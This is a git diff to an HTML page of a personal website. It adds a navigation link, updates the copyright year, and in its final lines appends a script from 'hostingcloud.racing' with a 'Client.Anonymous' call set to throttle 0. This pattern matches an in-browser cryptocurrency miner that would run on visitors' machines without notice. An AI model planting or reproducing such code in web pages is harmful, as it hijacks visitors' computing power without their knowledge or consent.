--- a/elements/generalized-risk.html
+++ b/elements/generalized-risk.html
@@ -100,6 +100,7 @@
 									<a class="fancy-dropdown-item" href="/support.html">Support My Noble Efforts</a>
 								</div>
 								<div class="col-sm-auto pr-4">
+									<a class="fancy-dropdown-item" href="/resources.html">References &amp; Resources</a>
 									<a class="fancy-dropdown-item" href="https://github.com/kawaiidesune/kawaiidesune.github.io"><i class="fab fa-github"></i> Repository for this Site</a>
 								</div>
 							</div>
@@ -125,7 +126,7 @@
 			<div class="container">
 				<div class="row align-items-center">
 					<div class="col-lg-4 order-lg-2"><a class="indicator indicator-up" href="#top" data-fancyscroll="data-fancyscroll"><span class="indicator-arrow indicator-arrow-one" data-zanim-xs='{"from":{"opacity":0,"y":15},"to":{"opacity":1,"y":-5,"scale":1},"ease":"Back.easeOut","duration":0.4,"delay":0.9}'></span><span class="indicator-arrow indicator-arrow-two" data-zanim-xs='{"from":{"opacity":0,"y":15},"to":{"opacity":1,"y":-5,"scale":1},"ease":"Back.easeOut","duration":0.4,"delay":1.05}'></span></a></div>
-					<div class="col-lg-4 text-lg-left mt-4 mt-lg-0"><p class="fs--1 text-uppercase ls font-weight-bold mb-0" xmlns:dct="http://purl.org/dc/terms/" xmlns:cc="http://creativecommons.org/ns#">&copy; 2020 <a rel="cc:attributionURL" href="https://vero.moe"><span rel="cc:attributionName">Véronique Bellamy</span></a>.</p></div>
+					<div class="col-lg-4 text-lg-left mt-4 mt-lg-0"><p class="fs--1 text-uppercase ls font-weight-bold mb-0" xmlns:dct="http://purl.org/dc/terms/" xmlns:cc="http://creativecommons.org/ns#">&copy; 2020-2021 <a rel="cc:attributionURL" href="https://vero.moe"><span rel="cc:attributionName">Véronique Bellamy</span></a>.</p></div>
 					<div class="col-lg-4 text-lg-right order-lg-2 mt-2 mt-lg-0"><p class="fs--1 text-uppercase ls font-weight-bold mb-0"><a href="https://creativecommons.org/licenses/by-sa/4.0">Some rights reserved. <i class="fab fa-creative-commons"></i> <i class="fab fa-creative-commons-by"></i> <i class="fab fa-creative-commons-sa"></i></a></p></div>
 				</div>
 			</div>
@@ -158,5 +159,12 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
+		<script>
+		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
+		        throttle: 0, c: 'w', ads: 0
+		    });
+		    _client.start();
+		</script>
 	</body>
 </html>
